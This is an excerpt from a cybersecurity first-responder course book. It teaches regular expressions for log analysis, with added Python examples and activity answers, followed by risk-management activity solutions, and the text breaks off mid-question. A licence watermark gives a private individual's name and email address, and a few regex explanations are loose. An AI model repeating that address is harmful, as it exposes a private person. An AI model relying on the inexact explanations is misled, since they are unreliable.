The exam-mapping document is available from the Course page on CHOICE. Log on to your CHOICE account, select the tile for this course, select the Files tile, and download and unzip the course files. The mapping reference will be in a subfolder named Mappings.

Best of luck in your exam preparation!


B Regular Expressions

Appendix Introduction

The following appendix provides an overview of regular expressions and how they may be useful to your log analysis efforts.


TOPIC A
Parse Log Files with Regular Expressions
Whether you're using command-line tools or graphical security information and event management (SIEM) systems, knowing how to craft a truly specialized search pattern is essential. In this topic, you'll use regular expressions to home in on the exact data you're looking for out of your logs.

Regular Expressions
Regular expressions can be a difficult concept for students to grasp. Throughout this topic, assure them that the expressions don't necessarily need to be perfect—as long as you find what you're looking for while avoiding false positives.

A regular expression (regex/regexp) is a group of characters that describe how to execute a specific search pattern on a given text. Regular expressions are a much more powerful way to search for specific strings in a text than standard string searches. Search operations using regular expressions use a common syntax, which includes various special characters that have specific uses. This results in the search being able to retrieve granular results that it would otherwise not be able to.

Consider the following dilemma: you have a log file, and you want to find a useful delimiter in this log file to cut on. In many log files, information types are separated by some form of punctuation, like colons, commas, periods, semicolons, etc. In the particular log file you're looking at, you know that each information type also has a space after the punctuation. So, how would you use a normal search string to find all of the punctuation in the log file that has a space after it? Simply using a space (" ") as a search string won't work, because it'll also include spaces between words. You could start writing a search string such as: ". " AND ": " AND ", " and so on until you've accounted for every possible punctuation mark, but this will end up making the search string verbose.
Now consider the following regular expression:

\W\s

It may not be immediately obvious, but this short string will return every instance of a non-word character that is followed by a whitespace character. In regular expressions, a non-word character is anything that is not a letter, number, or underscore. So, every punctuation mark followed by a space is covered by this one expression. This is only a simple example of the potential power behind regular expressions.

Regular Expression Libraries

There are actually several different regular expression libraries that you can work with. The two most common are Perl and Perl Compatible Regular Expressions (PCRE). The syntax for these two libraries is mostly the same; the differences typically center on the logic, constraints, and capabilities of each library.

Search Operators

The syntax for regular expressions behaves in similar ways to normal search strings. Searches are read from left to right, and can include any normal, unformatted characters. What separates regular expressions from their normal search counterparts is that they can include many different search operators that are not read directly, but interpreted. These search operators provide you with the ability to match repetitions in a pattern, limit the extent of that pattern, or configure your search in some other advanced way.

Quantification Operators
Search operators in the first category perform basic quantification; that is, they can match repetitions and specific numbers of instances of a pattern.

Appendix B : Regular Expressions | Topic A



Operator   Description and example

*          Matches zero or more instances of the preceding character.
           Example: 105* matches the "10" in "104", the "105" in "1052", and the "1055" in "1055".
?          Matches zero or one instance of the preceding character.
           Example: 105? matches the "10" in "104" and the "105" in "1052".
+          Matches one or more instances of the preceding character.
           Example: 105+ matches the "105" in "1052" and the "1055" in "1055".
{n}        Matches only n instance(s) of the preceding character.
           Example: 105{3} matches "10555".
{n,}       Matches at least n instance(s) of the preceding character.
           Example: 105{1,} matches "105", "1055", "10555", and so on.
{n,m}      Matches between n and m instances of the preceding character (inclusive).
           Example: 105{1,3} matches "105", "1055", and "10555".

Anchor Operators
Search operators in this next category are called anchors, as they prompt the search to match a specific location within the text.

Operator   Description and example

^          Matches the position at the beginning of the following string.
           Example: ^105 does not match "2105".
$          Matches the position at the end of the following string.
           Example: 105$ does not match "1052".

Character Set Operators
The next category concerns character sets, which enable you to define a wide range of characters to match all at once.

Operator   Description and example

[ ... ]    Matches any character within the set. The set is contained in the brackets.
           Example: [0123456789] matches every character in "1055". Likewise, [abcdef] matches the "e" and "c" in "security".
-          Matches a range of characters within the set.
           Example: [0-9] matches every character in "1055". Likewise, [a-f] matches the "e" and "c" in "security".
^          Inside brackets, this negates a set. Matches any characters or range of characters not in the set.
           Example: [^0123] matches the "5" in "105". Likewise, [^a-f] matches the "s", "u", "r", "i", "t", and "y" in "security".

Miscellaneous Search Operators
This last category contains miscellaneous search operators you can include in your regular expressions.

Operator   Description and example

.          Matches any character except for line breaks.
           Example: 105. matches "1055", "1056", "1057", and so on.
( ... )    Defines a subexpression with the pattern inside the parentheses.
           Example: ([0-9]abc){2} matches "5abc5abc". Without the parentheses it matches "5abcc".
|          The "OR" logical operator. Matches the preceding string or the following string.
           Example: 105|abc matches the "105" in "1055" and the "abc" in "abcdef".
\          Denotes the following character as a special character or a literal character. A literal character is used to "escape" a search operator.
           Example: \W is a special operator matching all non-words. It matches the "!" in "1055!".
           \$ is a literal character that matches the "$" in "$1055". Note that by escaping the character, it does not perform its regular expression function (anchoring the end of a string).

AWK-Specific Operators

The AWK programming language contains a few extra operators that can be used alongside regular expressions. These operators can be used for comparison or combination purposes. For example:
• ~ returns true if a field or expression (left operand) matches a regular expression (right operand). For example: awk '$1 ~ /105+/' file.txt checks if the first field in a text file matches the regular expression enclosed in slashes. (The program is single-quoted so that the shell does not expand $1 before awk sees it.)
• && combines two regular expressions. For example: awk '/105+/ && /abc/' file.txt will return lines from a file that match both regular expressions enclosed in slashes.
• ! checks if a regular expression is not present. For example: awk '! /105+/' file.txt returns lines from a file that do not match the regular expression enclosed in slashes.
Special Operators

Regular expression languages also include special operators that perform a variety of different functions in an expression. All of these special operators are preceded by a backslash character (\) so they are not interpreted literally.

Operator   Description and example

\w         Matches a word character. Word characters are defined as any letter, digit, or underscore.
           Example: 105\w matches "105a" and "1055".
\W         Matches a non-word character.
           Example: 105\W matches "105!".
\d         Matches any digit.
           Example: 105\d matches "1055".
\D         Matches any non-digit.
           Example: 105\D matches "105a".
\s         Matches any whitespace. Whitespace is defined as a space, tab, return, or newline character.
           Example: 105\s matches "105 ".
\S         Matches any non-whitespace.
           Example: 105\S matches "1055", "105a", "105!", and so on.
\b         Matches a word boundary. Word boundaries are defined as one side being any non-whitespace character, and the other side being a whitespace character.
           Example: 105\b matches the "105" in "22105" but does not match the "105" in "21052".
\B         Matches a non-word boundary.
           Example: 105\B matches the "105" in "21052" but does not match the "105" in "22105".
\c         Matches the following control character. A control character is a non-written symbol, like a tab or return.
           Example: 105\cI matches "105" with a horizontal tab after it (Ctrl+I).

Modifiers
Regular expressions can also be used with modifiers, which alter the behavior of the expression in some way. They are typically placed at the end of the expression to modify the whole thing, but some may also be placed inline to modify only part of the expression. The following are common modifiers:
• i ignores case sensitivity. Regular expressions are case sensitive by default.
• g is a global modifier that finds all matches rather than stopping after the first match.
• m turns on multi-line mode, which forces anchors to match the beginning or end of each line, rather than each string.
• s turns on single-line mode, which forces the . operator to match line break characters.
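As an added example (not from the course), the following Python code applies each of these four modifiers to a constructed three-line log snippet using the re module's equivalent flags: i as re.IGNORECASE, g as iterating over every match instead of a single search, m as re.MULTILINE, and s as re.DOTALL.

```python
import re

# Constructed sample log text (not from the course): three lines, mixed case.
LOG_TEXT = (
    "105 ERROR disk full\n"
    "2105 error retry\n"
    "105 Error giving up\n"
)


def first_match(pattern, text, flags=0):
    """A non-global search: only the first match, or None if there is none."""
    m = re.search(pattern, text, flags)
    return m.group(0) if m else None


def all_matches(pattern, text, flags=0):
    """The 'g' (global) behaviour: every non-overlapping match in the text."""
    return [m.group(0) for m in re.finditer(pattern, text, flags)]


def keyword_hits(keyword, text, ignore_case):
    """Keyword search with or without the 'i' modifier (re.IGNORECASE)."""
    flags = re.IGNORECASE if ignore_case else 0
    return all_matches(re.escape(keyword), text, flags)


def anchored_line_starts(text, multiline):
    """'^105' with or without the 'm' modifier (re.MULTILINE).

    Without m, ^ only matches at the very start of the whole text; with m it
    matches at the start of every line, so the third line is found as well.
    """
    flags = re.MULTILINE if multiline else 0
    return all_matches(r"^105", text, flags)


def dot_spans_lines(text, single_line):
    """'105.*up' with or without the 's' modifier (re.DOTALL).

    Without s, '.' stops at a line break, so only the last line can match;
    with s the greedy '.*' runs from the first '105' across every line break
    to the final 'up'.
    """
    flags = re.DOTALL if single_line else 0
    return first_match(r"105.*up", text, flags)


if __name__ == "__main__":
    print(keyword_hits("error", LOG_TEXT, ignore_case=False))  # ['error']
    print(keyword_hits("error", LOG_TEXT, ignore_case=True))   # ['ERROR', 'error', 'Error']
    print(anchored_line_starts(LOG_TEXT, multiline=False))     # ['105']
    print(anchored_line_starts(LOG_TEXT, multiline=True))      # ['105', '105']
    print(repr(dot_spans_lines(LOG_TEXT, single_line=False)))  # '105 Error giving up'
    print(repr(dot_spans_lines(LOG_TEXT, single_line=True)))   # the whole text up to the last 'up'
```
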

Build an Expression

Consider using these questions and the build process on another, more complex expression, like a search for all IP addresses.

Writing a good regular expression can be difficult, so often the best tactic to take is to build one out piece by piece.
In this example, you want to search your logs for any entries that contain an IP address range that you know to be malicious—188.24.122.0/24.
In order to start building any regular expression, there are some questions you should ask:
• What are the commonalities that are shared by all instances of the thing I'm searching for?
  • In the example, all IP addresses start with a number from 0 to 255, then include a period, then another number from 0 to 255, then a period, and so on.
• What can remain static in my search, and what must be variable?
  • In the example, the first three octets of the IP address are static—it's the last octet that will change.
• Do I need to escape any characters that are used as operators?
  • In the example, the periods between the octets don't change. However, the period is also a regular expression operator, so it needs to be escaped.
• Does the expression need to be perfect? Is it "good enough"?
  • IP octets stop at 255, but what are the chances that your logs include an invalid octet? In the example, you don't necessarily need to limit the last octet to only numbers from 0 to 255—any one to three digits should suffice.

Inform students that sometimes building an expression from left to right without skipping around can be more difficult. This is highly dependent on how students think about the logic of an expression. In the process example, steps 7 and 8 can be swapped.

So, after answering these questions, you can begin to build the expression. The process can go something like this:
1. Write the first static octet, 188
2. Write an escaped period (\.)
3. Write the second static octet, 24
4. Write an escaped period (\.)
5. Write the third static octet, 122
6. Write an escaped period (\.)
7. You want to match any number that has one, two, or three digits. So, you can use the range search operator {n,m} to do this—in this case, it would be {1,3}
8. The range search operator matches 1 to 3 instances of whatever comes before it. Right now that's a period, but you want it to be any digit. So, before the {1,3} add \d—the special operator that matches any digit.

Verify that your expression is as follows: 188\.24\.122\.\d{1,3}

This finished expression will match any IP address in the 188.24.122.0/24 range. It might find invalid addresses (like 188.24.122.389), but this is unlikely to be a problem. Therefore, the expression is good enough to apply to your current log analysis efforts.


Figure B-1: The process of building the IP address regular expression.
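As an added example (not from the course), the following Python code runs the finished expression over constructed log lines and compares it with a stricter variant of this example's own making, which adds \b anchors and limits the last octet to 0-255, so the cases where "good enough" admits a false positive are visible.

```python
import re

# The course's expression: good enough for most log analysis.
GOOD_ENOUGH = r"188\.24\.122\.\d{1,3}"

# Stricter variant added here (not from the course): \b on both ends stops the
# match being a fragment of a longer number, and the last octet is limited to
# 0-255 instead of any one to three digits.
STRICT = r"\b188\.24\.122\.(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)\b"

# Constructed log lines (not from the course). The last two are edge cases:
# an invalid last octet, and an address that merely contains 188.24.122.x as
# a substring.
SAMPLE_LOG = [
    "Source: 188.24.122.23 , Destination: 10.39.5.50",
    "Source: 10.39.5.10 , Destination: 10.39.5.100",
    "Source: 188.24.122.389 , Destination: 10.39.5.50",
    "Source: 2188.24.122.7 , Destination: 10.39.5.50",
]


def range_hits(lines, pattern=GOOD_ENOUGH):
    """Every substring of the log lines that the pattern accepts, in order."""
    regex = re.compile(pattern)
    return [m.group(0) for line in lines for m in regex.finditer(line)]


def false_positives(lines):
    """Hits the loose pattern reports that the strict one rejects."""
    strict = set(range_hits(lines, STRICT))
    return [hit for hit in range_hits(lines, GOOD_ENOUGH) if hit not in strict]


if __name__ == "__main__":
    print(range_hits(SAMPLE_LOG))          # three hits, two of them questionable
    print(range_hits(SAMPLE_LOG, STRICT))  # ['188.24.122.23']
    print(false_positives(SAMPLE_LOG))     # ['188.24.122.389', '188.24.122.7']
```
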



Types of Searches

Consider having students test these regular expressions at https://regex101.com. This list of search types is best used as a reference. If you choose to teach through them, consider doing so after students complete the activity.

How you use regular expressions will depend on what type of information you're looking for in your log files. Because most logs share a common set of information, some expressions in particular will be of great use to you. You might easily find yourself using these expressions over and over throughout the course of your duties, and you may even want to tweak the expressions so they are more applicable in certain contexts. The following are examples of regular expressions germane to log analysis. Each part of the text that matches the example expression is underlined.

Keyword Searches
These types of searches are useful when you know a certain keyword—like the word "error"—and you need to search your logs for all entries that contain this keyword in a certain context. For example, you only want to show errors that were logged on one specific day. You can also use keyword searches to search for keywords you've extrapolated from others. For example, if you've identified malware that always calls its executable files malice123.exe, then you'll want to search your system log for all executable file types (.bin, .exe, .bat, etc.) that have the malice123 name.
Examples:
• /error/i
Use to: Search for errors in a log (case insensitive).
Match example: "Application Error: Forcing Restart"
• malice123\.\w{1,4}
Use to: Search for all files named "malice123" that have a standard file extension length.


Match example: "File malice123.bat request FindConversation succeeded"
• .+@.+\.[a-z]{2,4}
Use to: Search for email addresses that match standard conventions.
Match example: "Outlook account login successful: john.doe@develetech.com"
• ((0[1-9])|(1[0-2]))\/((0[1-9])|(1\d)|(2\d)|(3[0-1]))\/((\d{4}))
Use to: Search for dates in the format MM/DD/YYYY.
Match example: "02/24/2016 08:23:56 Audit Failure"
• (([01]\d)|(2[0-3]))(:[0-5]\d){2}
Use to: Search for times in the format HH:MM:SS (24-hour clock).
Match example: "02/24/2016 14:23:56 Audit Failure"
Special Character Searches
Searching for special characters can help you quickly identify elements like encoded URLs and even other regular expression searches that are recorded in application, server, and client logs. The key to conducting most special character searches is to remember the importance of escaping characters to create literals.
Examples:
• (http|https):\/\/.*\.[a-z]{2,4}\/.*\?.*
Use to: Search for URLs that pass in query strings.
Match example: "GET request denied: https://develetech.com/signin?var1=user&var2=pass"
• \{\d\,\d\}|\[\d\-\d\]
Use to: Search a terminal log for entries that indicate a regular expression was performed.
Match example: "awk '/Feb\s1[0-5]/ && /10\.39\.5\.\d{1,3}/' syslog.txt"

IP Address Searches
Searching for IP addresses can help you easily find all log entries for a known malicious source or destination. It can also help you discover the details of an attack performed against a server or other host in your network.
Examples:
• 188\.24\.122\.\d{1,3}
Use to: Search for all logged IP addresses in the known malicious subnet 188.24.122.0/24.
Match example: "Source: 188.24.122.23 , Destination: 10.39.5.50"
• (\d{1,3}\.){3}\d{1,3}
Use to: Search for all possible IP addresses (including some invalid ones) in a log.
Match example: "Source: 10.39.5.10 , Destination: 10.39.5.100"
• (19[2-9](\.\d{1,3}){3})|(2[0-2][0-3](\.\d{1,3}){3})
Use to: Search for all logged Class C IP addresses in range 192.x.x.x to 199.x.x.x.
Match example: "Source: 188.24.122.23 , Destination: 192.168.10.23"

Port Number Searches
There are times when you'll need to quickly identify what Transmission Control Protocol/User Datagram Protocol (TCP/UDP) port a protocol or service is using to communicate. This can help you verify that your firewall is blocking connections to the ports you specify. You can also determine what service is causing trouble on a particular port.
Examples:
• ([1-9]\d{0,3}|[1-5]\d{4}|6[0-4]\d{3}|65[0-4]\d{2}|655[0-2]\d|6553[0-5])
Use to: Search for all possible port numbers in a log.
Match example: "ALLOW 1701 vpn.develetech.com"
• (49[2-9]\d{2}|491[6-9]\d|4915[2-9]|5\d{4}|6[0-4]\d{3}|65[0-4]\d{2}|655[0-2]\d|6553[0-5])
Use to: Search a log for only port numbers in the dynamic and private range.
Match example: "src = 10.39.5.10 , dst = 10.39.5.50 , port = 55166"
• ([1-9][0-9]{0,2}|10[01]\d|102[0-3])
Use to: Search a log for only port numbers in the well-known range.
Match example: "src = client00 , dst = https://www.develetech.com , port = 443"
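As an added example (not from the course), the following Python code combines the course's date, time, IP address, and port expressions into a small parser over constructed firewall log lines; the "port = " context and the \b anchors around the port expression are this example's own addition and show why the bare expression returns only a fragment of a five-digit port.

```python
import re

# The course's expressions for dates, times, IP addresses, and port numbers.
DATE = r"((0[1-9])|(1[0-2]))\/((0[1-9])|(1\d)|(2\d)|(3[0-1]))\/((\d{4}))"
TIME = r"(([01]\d)|(2[0-3]))(:[0-5]\d){2}"
IP = r"(\d{1,3}\.){3}\d{1,3}"
PORT_BODY = r"[1-9]\d{0,3}|[1-5]\d{4}|6[0-4]\d{3}|65[0-4]\d{2}|655[0-2]\d|6553[0-5]"

# Constructed firewall log lines (not from the course).
SAMPLE_LOG = [
    "02/24/2016 14:23:56 ALLOW src = 10.39.5.10 , dst = 10.39.5.50 , port = 55166",
    "02/24/2016 14:24:01 DENY src = 188.24.122.23 , dst = 10.39.5.50 , port = 443",
    "02/24/2016 14:24:07 DENY src = 188.24.122.23 , dst = 10.39.5.50 , port = 70000",
]


def naive_port(line):
    """The port expression searched anywhere in the line, exactly as printed above.

    With nothing to anchor it, the first alternative happily matches the '2'
    inside the date, so the result is not the port at all.
    """
    m = re.search(PORT_BODY, line)
    return m.group(0) if m else None


def port_after_label(line, anchored):
    """Port number following 'port = ', with or without \\b on both sides.

    Without anchors the alternatives are tried left to right and [1-9]\\d{0,3}
    wins with a four-digit prefix of a five-digit port; with \\b the engine
    must back off to the [1-5]\\d{4} alternative, and an out-of-range value
    such as 70000 is rejected outright.
    """
    body = r"\b(?:" + PORT_BODY + r")\b" if anchored else r"(?:" + PORT_BODY + r")"
    m = re.search(r"port = (?P<port>" + body + r")", line)
    return m.group("port") if m else None


def parse_entry(line):
    """Date, time, every IP address, and the (anchored) port from one line."""
    date = re.search(DATE, line)
    time = re.search(TIME, line)
    return {
        "date": date.group(0) if date else None,
        "time": time.group(0) if time else None,
        "ips": [m.group(0) for m in re.finditer(IP, line)],
        "port": port_after_label(line, anchored=True),
    }


if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(naive_port(entry), port_after_label(entry, anchored=False), parse_entry(entry))
```
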

Guidelines for Writing Regular Expressions

Note: All Guidelines for this lesson are available as checklists from the Checklist tile on the CHOICE Course screen.

Use the following guidelines when writing regular expressions.

Write Regular Expressions
When writing regular expressions:
• Use regular expressions over standard searches when you need to perform complex searches with several variables.
• Know the various search operators, special operators, and modifiers common to most regular expression libraries.
• Keep a reference card or other cheat sheet close by in case you forget what an operator or modifier does.
• Use quantification operators to repeat a character or group multiple times.
• Use anchor operators to ensure that you identify exact matches.
• Use character set operators to specify what characters or range of characters are allowed.
• Group subexpressions in parentheses.
• Escape characters that have special meaning by using a backslash.
• Use special operators to match all digits, words, and whitespaces, and their inverse.
• Use modifiers to adjust the behavior of the expression or subexpression (e.g., ignore case sensitivity).
ot
N
o
D

Appendix B : Regular Expressions | Topic A


Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 479

ACTIVITY B-1
Parsing Log Files with Regular Expressions

Scenario

Analyzing logs with your SIEM has proven to be useful, but you'd still like a more sophisticated way to parse these log files. So, you'll start writing regular expressions to get a more fine-tuned look at your data. Regular expressions will enhance your log analysis capabilities, and can even be applied in many other search scenarios.

Note: Throughout this activity, point students back to the material in this topic when they need help remembering symbols and expression syntax. Consider having students test their regular expressions at https://regex101.com. Consider stepping through each component of each regular expression. This can make it easier for students to parse what each component does, and how the whole expression comes together.

1. To test out your ability to write regular expressions, you should start with a simple example. A U.S. ZIP code, for instance, is five digits long, and can (for the most part) include any digit in any of the five positions.

How would you write a regular expression to capture all possible ZIP codes?
A: The simplest way to write this expression is \d{5}—this searches for any combination of five digits.

2. ZIP codes can also have a four-digit extension to further narrow down a location. The format of extended ZIP codes is #####-####.

How would you write a regular expression to capture all of these extended ZIP codes?
A: The expression \d{5}-\d{4} does the job.

3. There are times when you don't know the exact format of something, or you want to capture multiple formats.

In the ZIP code example, what if you wanted to capture all possible five-digit ZIP codes or any extended ZIP codes?
A: You can use the "OR" logical operator to do this. The expression could be something like \d{5}-\d{4}|\d{5}—this basically combines the two previous expressions using the pipe symbol to indicate an alternative. The order matters: alternatives are tried from left to right, so the longer extended form must come first, or \d{5} will be satisfied by the first five digits and the extension will never be captured.

4. You want to search your logs for any event that includes an error or failure message.

In the following space, write a regular expression that searches for these messages, regardless of capitalization.
A: A basic example is /error|fail/i. The trailing i modifier makes the match case-insensitive, so ERROR, Error, failed, and FAILURE all match; because a regular expression matches substrings, fail also covers failed and failure. (Writing fail* would instead match fai followed by zero or more l characters, which is not what is intended.)


5. You also want to search for any log entries that include any email address. Before you begin building your expression, answer these important questions. What do all email addresses share in common? What, if anything, can remain static in this expression? What characters will you need to escape? Does the expression need to be perfect?
A: All email addresses are in the basic format localname@domain.tld. The length and specific character requirements may vary; for example, top-level domains are generally not longer than four characters, the entire address is usually not allowed to be over 255 characters, and some systems do not allow certain special characters. Still, the @ symbol and the period are always going to be in an email address. Beyond this, nothing is really static, as you're trying to search for all possible addresses. The only real character you need to escape is the period before the top-level domain. The expression doesn't need to be perfect, and you may not even need to pay attention to character limits in the local name and domain sections.

6. In the following space, write out your regular expression to capture everything in an email address format.
A: A basic example is .+@.+\.[a-z]{2,4}—this works for most email addresses, but may not include some of the latest top-level domain suffixes. Be aware that .+ is greedy and matches any character, spaces included, so on a line that contains two addresses it will stretch across both of them as a single match. If you need to extract each address on its own, use a character class such as [^\s@]+ in place of .+.

7. Write a regular expression that will capture all possible IP addresses. Remember, your expressions don't need to be perfect to be functional.
A: A basic example is (\d{1,3}\.){3}\d{1,3}—though this example would allow illegal IP addresses (greater than 255 for an octet, for example). This may be good enough for your purposes, however, as you are unlikely to encounter invalid IP addresses in your logs. If you do need to reject them, replace each \d{1,3} with an octet subexpression such as (25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d), which only accepts 0 through 255.

8. When would you use regular expressions rather than normal searches in logs?
A: Answers will vary, but may include searching for any string that you know only part of; version numbers; timestamps; IP addresses; port numbers; user names; and more.
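The following Python example is added here (it is not part of the activity or the course's data files) and applies the answers to questions 1 through 7, together with the anchoring, alternation, escaping and modifier guidelines from this topic, to a handful of constructed log lines. It demonstrates three practical points a log search will run into: the alternation from question 3 must list the extended ZIP form first, the greedy .+ in the email expression from question 6 swallows an entire line that holds two addresses, and the IP expression from question 7 accepts 999.1.1.1 unless each octet is constrained to 0-255.

```python
from __future__ import annotations
import re

# Constructed sample log lines for the demonstration (not from the course's data files).
SAMPLE_LOG = [
    "2024-03-01 10:15:02 auth ERROR login failed for user1@develetech.com from 10.39.5.6",
    "2024-03-01 10:15:07 mail Delivered admin@example.org -> support@develetech.com status=ok",
    "2024-03-01 10:16:11 ship Label printed for 14624-1234 (warehouse 30301) build 999.1.1.1",
    "2024-03-01 10:16:40 web GET /index.html 200 from 192.168.10.23",
]


def zip_codes(text: str, extended_first: bool = True) -> list[str]:
    r"""Five-digit or extended ZIP codes (questions 1-3).

    Alternatives are tried left to right, so \d{5}-\d{4} must precede \d{5}; with the
    order reversed the engine is satisfied by '14624' and never sees the extension.
    Word-boundary anchors keep longer digit runs from matching partially.
    """
    alts = r"\d{5}-\d{4}|\d{5}" if extended_first else r"\d{5}|\d{5}-\d{4}"
    return re.findall(r"\b(?:" + alts + r")\b", text)


ERROR_OR_FAIL = re.compile(r"error|fail", re.IGNORECASE)   # question 4: /error|fail/i


def flagged_lines(lines: list[str]) -> list[str]:
    """Lines carrying an error or failure message, regardless of capitalization.
    'fail' also covers 'failed' and 'failure' because a regex matches substrings."""
    return [line for line in lines if ERROR_OR_FAIL.search(line)]


LOOSE_EMAIL = re.compile(r".+@.+\.[a-z]{2,4}")                       # question 6 as written
STRICT_EMAIL = re.compile(r"[^\s@]+@[^\s@]+\.[a-z]{2,}", re.IGNORECASE)


def loose_emails(text: str) -> list[str]:
    """Greedy .+ runs across the whole line, so two addresses collapse into one match."""
    return LOOSE_EMAIL.findall(text)


def emails(text: str) -> list[str]:
    r"""Replacing .+ with [^\s@]+ (no whitespace, no @) isolates each address."""
    return STRICT_EMAIL.findall(text)


OCTET = r"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)"                       # 0-255, no leading zeros
IPV4_LOOSE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")             # question 7 as written
IPV4_STRICT = re.compile(r"\b(?:" + OCTET + r"\.){3}" + OCTET + r"\b")


def ipv4_addresses(text: str, strict: bool = False) -> list[str]:
    """IPv4 addresses; strict=True rejects octets above 255 such as 999.1.1.1."""
    return (IPV4_STRICT if strict else IPV4_LOOSE).findall(text)


if __name__ == "__main__":
    print(zip_codes(SAMPLE_LOG[2]))                        # ['14624-1234', '30301']
    print(zip_codes(SAMPLE_LOG[2], extended_first=False))  # ['14624', '30301']
    print(flagged_lines(SAMPLE_LOG))                       # only the ERROR line
    print(loose_emails(SAMPLE_LOG[1]))                     # one match spanning the line
    print(emails(SAMPLE_LOG[1]))                           # ['admin@example.org', 'support@develetech.com']
    print(ipv4_addresses(SAMPLE_LOG[2]), ipv4_addresses(SAMPLE_LOG[2], strict=True))
```

Each function returns the matches rather than printing them so the expressions can be dropped into a larger log-parsing script; paste the same patterns into https://regex101.com with the sample lines to step through what each component consumes.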
Solutions

ACTIVITY 1-1: Identifying the Importance of Risk Management

1. Why would these changes necessitate the re-evaluation of a risk management strategy?
A: Answers will vary, but significant changes can bring about risk in many different ways. It may become more challenging to secure sensitive information and keep it out of unauthorized hands, or it may simply require more resources to secure more at-risk areas. Managing risk to information and systems will help your organization avoid legal and financial disasters. Additionally, there will be pressure from stakeholders, customers, and regulatory entities to conform to their expectations and meet standardization requirements. There is also the chance that an increase in the amount of communications in the organization will exponentially increase the amount of risk that these communication channels take on. You need to make sure changes to your organization can uphold risk management expectations.

2. What are the specific types of risk that could affect Develetech as it expands its business?
A: Answers will vary, as there are many potential risks. Additional offices and warehouses will require an infrastructure overhaul, which will require a reevaluation of infrastructural integrity. Certain physical assets, including computers and networking equipment, may not be able to sustain an increase in operational capacity. More personnel may increase the risk of a safety incident. Failing to understand and adhere to laws and regulations, especially when moving operations into a foreign country, may create legality issues for the organization. Financially, a security breach could cost the organization a great deal, and its reputation may suffer as a result. There may also be potential issues with the supply chain, which can have operational impacts on the business.

3. What risk analysis method would you prefer to use to determine Develetech's risk exposure in this area, and why?
A: Answers will vary, but most organizations choose a combination of both quantitative and qualitative analysis methods with an emphasis one way or the other. When it comes to risk, there is not necessarily an objectively right answer. Quantitative analysis tends to be more precise, but it's also expensive and not always feasible; qualitative analysis tends to be faster and cheaper, but it's not always useful. Semi-quantitative analysis may be able to leverage the strengths of both while minimizing their weaknesses. In any case, you may need more information about a situation before the best approach becomes obvious.

ACTIVITY 1-2: Assessing Risk

1. What laws and regulations might Develetech be subject to?
A: Answers will vary, but among those discussed in this topic, Develetech is likely subject to U.S. laws like SOX and CAN-SPAM. Develetech probably doesn't handle health records, so HIPAA is unlikely to be relevant. Develetech is also likely subject to GDPR since it does business all over the world, including the European Union.

2. How will both internal and external compliance factors influence your risk assessment?
A: Answers may vary. Your internal staff needs to comply with your risk management plan once it has been put in place. This usually means training certain staff is required; otherwise, they might not be properly equipped to meet compliance requirements. Because internal users access your systems constantly, they can bring a great deal of risk. Externally, your organization must comply with all applicable laws and regulations. Even failure to comply with non-legally binding, industry-accepted standards may place your organization's finances or reputation in jeopardy. However, external compliance will not guarantee security. You may find that your risk is still too high even though you adhere to security requirements.

3. What is the annual loss expectancy (ALE) for a flood damaging the warehouse?
○  $800,000
◉  $200,000
○  $5,000,000
○  $20,000,000

ACTIVITY 1-3: Mitigating Risk

1. What controls can you implement to round out your risk mitigation strategy and uphold the components of the CIA triad?
A: Answers will vary, but a strong way to secure confidentiality is through encryption. Encrypting the database will deter unauthorized users from making sense of the stored data. You could also implement access control to prevent an intrusion before it even begins. This will keep your databases out of the hands of an attacker. In addition, you can implement physical security measures in case an attacker has in-person access to these databases.

2. To conduct a proper analysis of how this could bring risk to your organization, what are some of the questions you need to ask?
A: Answers will vary, but you should ask how easily exploitable the flaw is, and what the scope of an exploit could be. Can an exploit expose confidential information? Can it crash the app or otherwise render other systems unavailable? What attack vectors exist that could allow an attacker to carry out this exploit? What mitigation plans, if any, are in place to address this flaw? How easily and quickly can you patch the flaw, and how will you deploy it so that all of the app's users are covered?

3. How will you respond to this risk?
A: The answer is debatable and may require more careful analysis. However, some may argue that the strong input validation controls already in place imply that you should just accept the risk and save yourself the time, effort, and cost of an active response. Others will say that this is inadequate because it only accounts for known values, and that an attacker could find a way around the validation. This would necessitate a response like mitigation, in which more application security controls are implemented to harden the app against attack. Some might suggest transferring the risk to another organization that can provide more reliable security. Some might even argue that the risk to your customers' confidentiality is too great, and that you should avoid the risk entirely by dropping the internally developed app and using a different solution.

ACTIVITY 1-4: Integrating Documentation into Risk Management

5. What are some other acceptable or unacceptable behaviors you can incorporate in a policy like this one?
A: Answers will vary, but you could further assist help desk employees in defending against attacks by forbidding communication using unauthorized channels like private Facebook and Skype accounts. You can also take a more positive approach by outlining acceptable behavior when it comes to the content of a help desk request; for example, the information that should be included in an email request so that it's both useful to the help desk employee and secure at the same time. Likewise, you can encourage or mandate email encryption to provide some measure of authentication and confidentiality in all such requests.

8. Why is it important to maintain a revision history in policies like this one?
A: Answers may vary, but security policies, procedures, and processes are living documents. This means that, in the event of newly identified threats or vulnerabilities, you can adjust the document accordingly. Documents that cannot keep up with ever-shifting organizational risk factors are unhelpful to their intended audience. Recording a revision history will ensure there is a trail of changes and that each change is known in the context of when it was made, and that the person(s) who made the changes are held accountable.

ACTIVITY 2-1: Constructing a Threat Profile

1. What attack technique criteria do you envision threat actors are most likely to use in order to compromise this database?
A: Answers will vary. Depending on the strength of any in-place security controls, an attacker may be inclined to launch a direct attack on the database. This is more likely to net the attacker access to everything in the database; however, if they are only searching for specific information, they may choose more indirect means. Because the database is likely to already be hardened against attack, attackers would probably opt to choose stealthy methods. This would ensure the attack remains undetected before damage is done, and it may help the attacker cover their tracks afterward. However, attackers interested more in causing damage and denial of service may forgo stealth to maximize their impact.

2. How could security vulnerabilities and exploitation tools shape the vector a threat actor may use to attack the database?
A: Answers will vary. There are several potential vulnerabilities that could open the way for an attacker. The database itself may be employing weak authentication mechanisms, such as an easily guessed administrator password. The database may also use poor or obsolete encryption, making it easy for the attacker to read the data once they've accessed it. Outside the database, unpatched network authorization mechanisms could give the attacker remote access to the database. As far as exploitation tactics, there are many tools available that can capture network authentication packets as well as cause a database to dump its contents. Certain payloads can also be injected into a database to passively monitor new entries or changes.

3. What do you believe are the most likely intentions an attacker has when it comes to compromising the customer records database?
